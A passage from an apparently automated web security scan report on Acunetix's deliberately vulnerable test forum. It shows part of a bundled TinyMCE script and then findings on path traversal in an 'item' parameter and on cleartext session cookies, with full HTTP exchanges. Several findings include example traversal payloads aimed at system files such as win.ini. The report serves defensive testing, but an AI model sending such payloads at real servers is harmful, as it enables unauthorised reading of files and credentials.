"mceCleanup":tinyMCE._setHTML(this.contentDocument,this.getBody().innerHTML);tinyMCE.setInnerHTML(this.getBody(),tinyMCE._cleanupHTML(this,this.contentDocument,this.settings,this.getBody(),this.visualAid));tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE._setEventsEnabled(this.getBody(),false);this.repaint();tinyMCE.triggerNodeChange();break;case "mceReplaceContent":this.getWin().focus();var selectedText="";if(tinyMCE.isMSIE){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText=this.getSel().toString();if(selectedText.length>0){value=tinyMCE.replaceVar(value,"selection",selectedText);tinyMCE.execCommand('mceInsertContent',false,value);}tinyMCE.triggerNodeChange();break;case "mceSetAttribute":if(typeof(value)=='object'){var targetElms=(typeof(value['targets'])=="undefined")?"p,img,span,div,td,h1,h2,h3,h4,h5,h6,pre,address":value['targets'];var targetNode=tinyMCE.getParentElement(this.getFocusElement(),targetElms);if(targetNode){targetNode.setAttribute(value['name'],value['value']);tinyMCE.triggerNodeChange();}}break;case "mceSetCSSClass":this.execCommand("SetStyleInfo",false,{command:"setattrib",name:"class",value:value});break;case "mceInsertRawHTML":var key='tiny_mce_marker';this.execCommand('mceBeginUndoLevel');this.execCommand('mceInsertContent',false,key);var scrollX=this.getDoc().body.scrollLeft+this.getDoc().documentElement.scrollLeft;var scrollY=this.getDoc().body.scrollTop+this.getDoc().documentElement.scrollTop;var html=this.getBody().innerHTML;if((pos=html.indexOf(key))!=-1)tinyMCE.setInnerHTML(this.getBody(),html.substring(0,pos)+value+html.substring(pos+key.length));this.contentWindow.scrollTo(scrollX,scrollY);this.execCommand('mceEndUndoLevel');break;case "mceInsertContent":var insertHTMLFailed=false;this.getWin().focus();if(tinyMCE.isGecko||tinyMCE.isOpera){try{this.getDoc().execCommand('inserthtml',false,value);}catch(ex){insertHTMLFailed=true;}if(!insertHTMLFailed){tinyMCE.triggerNodeChange();return;}}if(tinyMCE.isOpera&&insertHTMLFailed){this.getDoc().execCommand("insertimage",false,tinyMCE.uniqueURL);var ar=tinyMCE.getElementsByAttributeValue(this.getBody(),"img","src",tinyMCE.uniqueURL);ar[0].outerHTML=value;return;}if(!tinyMCE.isMSIE){var isHTML=value.indexOf('<')!=-1;var sel=this.getSel();var rng=this.getRng();if(isHTML){if(tinyMCE.isSafari){var tmpRng=this.getDoc().createRange();tmpRng.setStart(this.getBody(),0);tmpRng.setEnd(this.getBody(),0);value=tmpRng.createContextualFragment(value);}else value=rng.createContextualFragment(value);}else{var el=document.createElement("div");el.innerHTML=value;value=el.firstChild.nodeValue;value=doc.createTextNode(value);}if(tinyMCE.isSafari&&!isHTML){this.execCommand('InsertText',false,value.nodeValue);tinyMCE.triggerNodeChange();return true;}else if(tinyMCE.isSafari&&isHTML){rng.deleteContents();rng.insertNode(value);tinyMCE.triggerNodeChange();return true;}rng.deleteContents();if(rng.startContainer.nodeType==3){var node=rng.startContainer.splitText(rng.startOffset);node.parentNode.insertBefore(value,node);}else rng.insertNode(value);if(!isHTML){sel.selectAllChildren(doc.body);sel.removeAllRanges();var rng=doc.createRange();rng.selectNode(value);rng.collapse(false);sel.addRange(rng);}else rng.collapse(false);}else{var rng=doc.selection.createRange();if(rng.item)rng.item(0).outerHTML=value;else rng.pasteHTML(value);}tinyMCE.triggerNodeChange();break;case "mceStartTyping":if(tinyMCE.settings['custom_undo_redo']&&this.typingUndoIndex==-1){this.typingUndoIndex=this.undoIndex;this.execCommand('mceAddUndoLevel');}break;case "mceEndTyping":if(tinyMCE.settings['custom_undo_redo']&&this.typingUndoIndex!=-1){this.execCommand('mceAddUndoLevel');this.typingUndoIndex=-1;}break;case "mceBeginUndoLevel":this.undoRedo=false;break;case "mceEndUndoLevel":this.undoRedo=true;this.execCommand('mceAddUndoLevel');break;case "mceAddUndoLevel":if(tinyMCE.settings['custom_undo_redo']&&this.undoRedo){if(this.typingUndoIndex!=-1){this.undoIndex=this.typingUndoIndex;}var newHTML=tinyMCE.trim(this.getBody().innerHTML);if(newHTML!=this.undoLevels[this.undoIndex]){tinyMCE.executeCallback('onchange_callback','_onchange',0,this);var customUndoLevels=tinyMCE.settings['custom_undo_redo_levels'];if(customUndoLevels!=-1&&this.undoLevels.length>customUndoLevels){for(var i=0;i<this.undoLevels.length-1;i++){this.undoLevels[i]=this.undoLevels[i+1];}this.undoLevels.length--;this.undoIndex--;}this.undoIndex++;this.undoLevels[this.undoIndex]=newHTML;this.undoLevels.length=this.undoIndex+1;tinyMCE.triggerNodeChange(false);}}break;case "Undo":if(tinyMCE.settings['custom_undo_redo']){tinyMCE.execCommand("mceEndTyping");if(this.undoIndex>0){this.undoIndex--;tinyMCE.setInnerHTML(this.getBody(),this.undoLevels[this.undoIndex]);this.repaint();}tinyMCE.triggerNodeChange();}else this.getDoc().execCommand(command,user_interface,value);break;case "Redo":if(tinyMCE.settings['custom_undo_redo']){tinyMCE.execCommand("mceEndTyping");if(this.undoIndex<(this.undoLevels.length-1)){this.undoIndex++;tinyMCE.setInnerHTML(this.getBody(),this.undoLevels[this.undoIndex]);this.repaint();}tinyMCE.triggerNodeChange();}else this.getDoc().execCommand(command,user_interface,value);break;case "mceToggleVisualAid":this.visualAid=!this.visualAid;tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE.triggerNodeChange();break;case "Indent":this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();if(tinyMCE.isMSIE){var n=tinyMCE.getParentElement(this.getFocusElement(),"blockquote");do{if(n&&n.nodeName=="BLOCKQUOTE"){n.removeAttribute("dir");n.removeAttribute("style");}}while(n!=null&&(n=n.parentNode)!=null);}break;case "removeformat":var text=this.getSelectedText();if(tinyMCE.isOpera){this.getDoc().execCommand("RemoveFormat",false,null);return;}if(tinyMCE.isMSIE){try{var rng=doc.selection.createRange();rng.execCommand("RemoveFormat",false,null);}catch(e){}this.execCommand("SetStyleInfo",false,{command:"removeformat"});}else{this.getDoc().execCommand(command,user_interface,value);this.execCommand("SetStyleInfo",false,{command:"removeformat"});}if(text.length==0)this.execCommand("mceSetCSSClass",false,"");tinyMCE.triggerNodeChange();break;default:this.getDoc().execCommand(command,user_interface,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);else tinyMCE.triggerNodeChange();}if(command!="mceAddUndoLevel"&&command!="Undo"&&command!="Redo"&&command!="mceStartTyping"&&command!="mceEndTyping")tinyMCE.execCommand("mceAddUndoLevel");};TinyMCEControl.prototype.queryCommandValue=function(command){return this.getDoc().queryCommandValue(command);};TinyMCEControl.prototype.queryCommandState=function(command){return this.getDoc().queryCommandState(command);};TinyMCEControl.prototype.onAdd=function(replace_element,form_element_name,target_document){var targetDoc=target_document?target_document:document;this.targetDoc=targetDoc;tinyMCE.themeURL=tinyMCE.baseURL+"/themes/"+this.settings['theme'];this.settings['themeurl']=tinyMCE.themeURL;if(!replace_element){alert("Error: Could not find the target element.");return false;}var templateFunction=tinyMCE._getThemeFunction('_getInsertLinkTemplate');if(eval("typeof("+templateFunction+")")!='undefined')this.insertLinkTemplate=eval(templateFunction+'(this.settings);');var templateFunction=tinyMCE._getThemeFunction('_getInsertImageTemplate');if(eval("typeof("+templateFunction+")")!='undefined')this.insertImageTemplate=eval(templateFunction+'(this.settings);');var templateFunction=tinyMCE._getThemeFunction('_getEditorTemplate');if(eval("typeof("+templateFunction+")")=='undefined'){alert("Error: Could not find the template function: "+templateFunction);return false;}var editorTemplate=eval(templateFunction+'(this.settings, this.editorId);');var deltaWidth=editorTemplate['delta_width']?editorTemplate['delta_width']:0;var deltaHeight=editorTemplate['delta_height']?editorTemplate['delta_height']:0;var html='<span id="'+this.editorId+'_parent">'+editorTemplate['html'];var templateFunction=tinyMCE._getThemeFunction('_handleNodeChange',true);if(eval("typeof("+templateFunction+")")!='undefined')this.settings['handleNodeChangeCallback']=templateFunction;html=tinyMCE.replaceVar(html,"editor_id",this.editorId);this.settings['default_document']=tinyMCE.baseURL+"/blank.htm";this.settings['old_width']=this.settings['width'];this.settings['old_height']=this.settings['height'];if(this.settings['width']==-1)this.settings['width']=replace_element.offsetWidth;if(this.settings['height']==-1)this.settings['height']=replace_element.offsetHeight;if(this.settings['width']==0)this.settings['width']=replace_element.style.width;if(this.settings['height']==0)this.settings['height']=replace_element.style.height;if(this.settings['width']==0)this.settings['width']=320;if(this.settings['height']==0)this.settings['height']=240;this.settings['area_width']=parseInt(this.settings['width']);this.settings['area_height']=parseInt(this.settings['height']);this.settings['area_width']+=deltaWidth;this.settings['area_height']+=deltaHeight;if((""+this.settings['width']).indexOf('%')!=-1)this.settings['area_width']="100%";if((""+this.settings['height']).indexOf('%')!=-1)this.settings['area_height']="100%";if((""+replace_element.style.width).indexOf('%')!=-1){this.settings['width']=replace_element.style.width;this.settings['area_width']="100%";}if((""+replace_element.style.height).indexOf('%')!=-1){this.settings['height']=replace_element.style.height;this.settings['area_height']="100%";}html=tinyMCE.applyTemplate(html);this.settings['width']=this.settings['old_width'];this.settings['height']=this.settings['old_height'];this.visualAid=this.settings['visual'];this.formTargetElementId=form_element_name;if(replace_element.nodeName=="TEXTAREA"||replace_element.nodeName=="INPUT")this.startContent=replace_element.value;else this.startContent=replace_element.innerHTML;if(replace_element.nodeName.toLowerCase()!="textarea"){this.oldTargetElement=replace_element.cloneNode(true);if(tinyMCE.settings['debug'])html+='<textarea wrap="off" id="'+form_element_name+'" name="'+form_element_name+'" cols="100" rows="15"></textarea>';else html+='<input type="hidden" type="text" id="'+form_element_name+'" name="'+form_element_name+'" />';html+='</span>';if(!tinyMCE.isMSIE){var rng=replace_element.ownerDocument.createRange();rng.setStartBefore(replace_element);var fragment=rng.createContextualFragment(html);replace_element.parentNode.replaceChild(fragment,replace_element);}else replace_element.outerHTML=html;}else{html+='</span>';this.oldTargetElement=replace_element;if(!tinyMCE.settings['debug'])this.oldTargetElement.style.display="none";if(!tinyMCE.isMSIE){var rng=replace_element.ownerDocument.createRange();rng.setStartBefore(replace_element);var fragment=rng.createContextualFragment(html);replace_element.parentNode.insertBefore(fragment,replace_element);}else replace_element.insertAdjacentHTML("beforeBegin",html);}var dynamicIFrame=false;var tElm=targetDoc.getElementById(this.editorId);if(!tinyMCE.isMSIE){if(tElm&&tElm.nodeName.toLowerCase()=="span"){tElm=tinyMCE._createIFrame(tElm);dynamicIFrame=true;}this.targetElement=tElm;this.iframeElement=tElm;this.contentDocument=tElm.contentDocument;this.contentWindow=tElm.contentWindow;}else{if(tElm&&tElm.nodeName.toLowerCase()=="span")tElm=tinyMCE._createIFrame(tElm);else tElm=targetDoc.frames[this.editorId];this.targetElement=tElm;this.iframeElement=targetDoc.getElementById(this.editorId);if(tinyMCE.isOpera){this.contentDocument=this.iframeElement.contentDocument;this.contentWindow=this.iframeElement.contentWindow;dynamicIFrame=true;}else{this.contentDocument=tElm.window.document;this.contentWindow=tElm.window;}this.getDoc().designMode="on";}var doc=this.contentDocument;if(dynamicIFrame){var html=tinyMCE.getParam('doctype')+'<html><head xmlns="http://www.w3.org/1999/xhtml"><base href="'+tinyMCE.settings['base_href']+'" /><title>blank_page</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"></head><body class="mceContentBody"></body></html>';try{this.getDoc().designMode="on";doc.open();doc.write(html);doc.close();}catch(e){this.getDoc().location.href=tinyMCE.baseURL+"/blank.htm";}}if(tinyMCE.isMSIE)window.setTimeout("TinyMCE.prototype.addEventHandlers('"+this.editorId+"');",1);tinyMCE.setupContent(this.editorId,true);return true;};TinyMCEControl.prototype.getFocusElement=function(){if(tinyMCE.isMSIE&&!tinyMCE.isOpera){var doc=this.getDoc();var rng=doc.selection.createRange();var elm=rng.item?rng.item(0):rng.parentElement();}else{var sel=this.getSel();var rng=this.getRng();var elm=rng.commonAncestorContainer;if(!rng.collapsed){if(rng.startContainer==rng.endContainer){if(rng.startOffset-rng.endOffset<2){if(rng.startContainer.hasChildNodes())elm=rng.startContainer.childNodes[rng.startOffset];}}}elm=tinyMCE.getParentElement(elm);}return elm;};var tinyMCE=new TinyMCE();var tinyMCELang=new Array();
Issue Background

This finding concerns the use of a component (library, framework, runtime, or server) with known vulnerabilities or that is unmaintained/outdated. Use of unmaintained or vulnerable third-party components means the application inherits their known weaknesses, which are widely published and frequently have public exploits.

Severity is governed by the worst exploitable issue in the affected component and can reach critical (e.g. an RCE in a parsing library). This is a top OWASP Top 10 (2021) category - A06: Vulnerable and Outdated Components.

Remediation

Manage components actively:

  • Maintain an inventory (SBOM) of all components and versions and monitor it with software-composition-analysis tooling against vulnerability feeds.
  • Patch or upgrade vulnerable components promptly; remove unused dependencies and features.
  • Obtain components from official sources, prefer maintained releases, and verify integrity.

Medium CWE-22 - Path Traversal 2 findings

↩ Glossary29. Path traversal / local file inclusion candidate in 'item' parameter
Severity: Medium  |  Confidence: Tentative  |  CWE: CWE-22 [ref]  |  OWASP: A01:2021  |  Discovered: 2026-07-18 19:43:18
URL
http://testasp.vulnweb.com/Search.asp?tfSearch=test
Detail
A navigation link uses an 'item' parameter whose value is a file path (item=html/...). If this parameter is used to select and include a file from disk, an attacker may supply traversal sequences (e.g. item=../../../../windows/win.ini) to read files outside the intended directory. The parameter structurally holds a path, making it a directory-traversal / LFI candidate on this ASP application.
AI Confidence
58%
Evidence
href="Templatize.asp?item=html/about.html"
HTTP Request
Full request
GET /Search.asp?tfSearch=test HTTP/1.1
Host: testasp.vulnweb.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=admin
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG; path=/
X-Powered-By: ASP.NET
Date: Sat, 18 Jul 2026 23:41:46 GMT
Content-Length: 2964


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum search</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3Dtest" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3Dtest" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
      <form name="frmSearch" method="get" action="">
        <div class="FramedForm">
          <input name="tfSearch" type="text" class="search">
          <input class="search" type="submit" value="search posts">
        </div>
      </form>      
        <div class='path'>You searched for 'test'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"></table>      
      <!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

Path traversal (directory traversal) and file inclusion arise when user input is used to build a filesystem path or an inclusion target without proper validation, allowing an attacker to escape the intended directory using traversal sequences (../, encoded variants, absolute paths). This grants read access to arbitrary files - application source code, configuration and credential files, /etc/passwd, Java WEB-INF/web.xml, framework secrets - and, where the target is included or executed, can lead to remote code execution.

The disclosed material (source, keys, connection strings, tokens) frequently enables a far more serious follow-on compromise, so the issue is treated as high severity even when it appears to "only" read files.

Remediation

Remove user control over the filesystem path:

  • Avoid passing user input to filesystem APIs. Where possible map an opaque identifier to a server-side path via a fixed lookup table.
  • Canonicalise and verify containment - resolve the requested path to its canonical absolute form and confirm it is still inside the intended base directory before opening it; reject otherwise.
  • Strict allow-list validation of the filename (e.g. a known set of names, or [A-Za-z0-9_-] with a fixed extension); decode once and reject traversal sequences and null bytes.
  • Disable remote/dynamic inclusion (e.g. PHP allow_url_include) and run with least filesystem privilege.
↩ Glossary30. Suspected path traversal / local file inclusion in 'item' parameter
Severity: Medium  |  Confidence: Tentative  |  CWE: CWE-22 [ref]  |  OWASP: A01:2021  |  Discovered: 2026-07-19 11:34:33
URL
http://testasp.vulnweb.com/Default.asp
Detail
An 'item' parameter carries a file path (item=html/...) used by the 'about' page and recorded in the Referer header, indicating the value selects a file to include or render. Parameters that hold file paths are strong path-traversal / local file inclusion candidates; a payload such as item=../../../../file could expose files outside the intended directory.
AI Confidence
58%
Evidence
Referer: http://testasp.vulnweb.com/Templatize.asp?item=html/about.html  and  <a href="Templatize.asp?item=html/about.html" class="menu">about</a>
HTTP Request
Full request
GET /Default.asp HTTP/1.1
Host: testasp.vulnweb.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Templatize.asp?item=html/about.html
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ; ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 15:32:25 GMT
Content-Length: 3538


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum forums</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" -->
<!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
	<table width="100%" border="0" cellspacing="0" cellpadding="5">
      <tr>
        <td class="tableheader">Forum</td>
        <td class="tableheader">Threads</td>
        <td class="tableheader">Posts</td>
        <td class="tableheader">Last Post</td>
      </tr>   
	<tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>7</td><td>7</td><td>7/19/2026 3:23:36 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr>
	</table><!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

Path traversal (directory traversal) and file inclusion arise when user input is used to build a filesystem path or an inclusion target without proper validation, allowing an attacker to escape the intended directory using traversal sequences (../, encoded variants, absolute paths). This grants read access to arbitrary files - application source code, configuration and credential files, /etc/passwd, Java WEB-INF/web.xml, framework secrets - and, where the target is included or executed, can lead to remote code execution.

The disclosed material (source, keys, connection strings, tokens) frequently enables a far more serious follow-on compromise, so the issue is treated as high severity even when it appears to "only" read files.

Remediation

Remove user control over the filesystem path:

  • Avoid passing user input to filesystem APIs. Where possible map an opaque identifier to a server-side path via a fixed lookup table.
  • Canonicalise and verify containment - resolve the requested path to its canonical absolute form and confirm it is still inside the intended base directory before opening it; reject otherwise.
  • Strict allow-list validation of the filename (e.g. a known set of names, or [A-Za-z0-9_-] with a fixed extension); decode once and reject traversal sequences and null bytes.
  • Disable remote/dynamic inclusion (e.g. PHP allow_url_include) and run with least filesystem privilege.

Medium CWE-319 - Cleartext Transmission of Sensitive Information 1 finding

↩ Glossary31. Cleartext transmission of session over HTTP
Severity: Medium  |  Confidence: Firm  |  CWE: CWE-319 [ref]  |  OWASP: A02:2021  |  Discovered: 2026-07-18 19:43:18
URL
http://testasp.vulnweb.com/Search.asp?tfSearch=test
Detail
The request and response are served over plain HTTP (url scheme http://), and numerous ASPSESSIONID session cookies are transmitted in the Cookie header in the clear. All request and response content, including session identifiers, is exposed to any party able to observe the network path.
AI Confidence
85%
Evidence
url: http://testasp.vulnweb.com/... ; Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ...
HTTP Request
Full request
GET /Search.asp?tfSearch=test HTTP/1.1
Host: testasp.vulnweb.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=admin
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG; path=/
X-Powered-By: ASP.NET
Date: Sat, 18 Jul 2026 23:41:46 GMT
Content-Length: 2964


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum search</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3Dtest" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3Dtest" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
      <form name="frmSearch" method="get" action="">
        <div class="FramedForm">
          <input name="tfSearch" type="text" class="search">
          <input class="search" type="submit" value="search posts">
        </div>
      </form>      
        <div class='path'>You searched for 'test'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"></table>      
      <!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
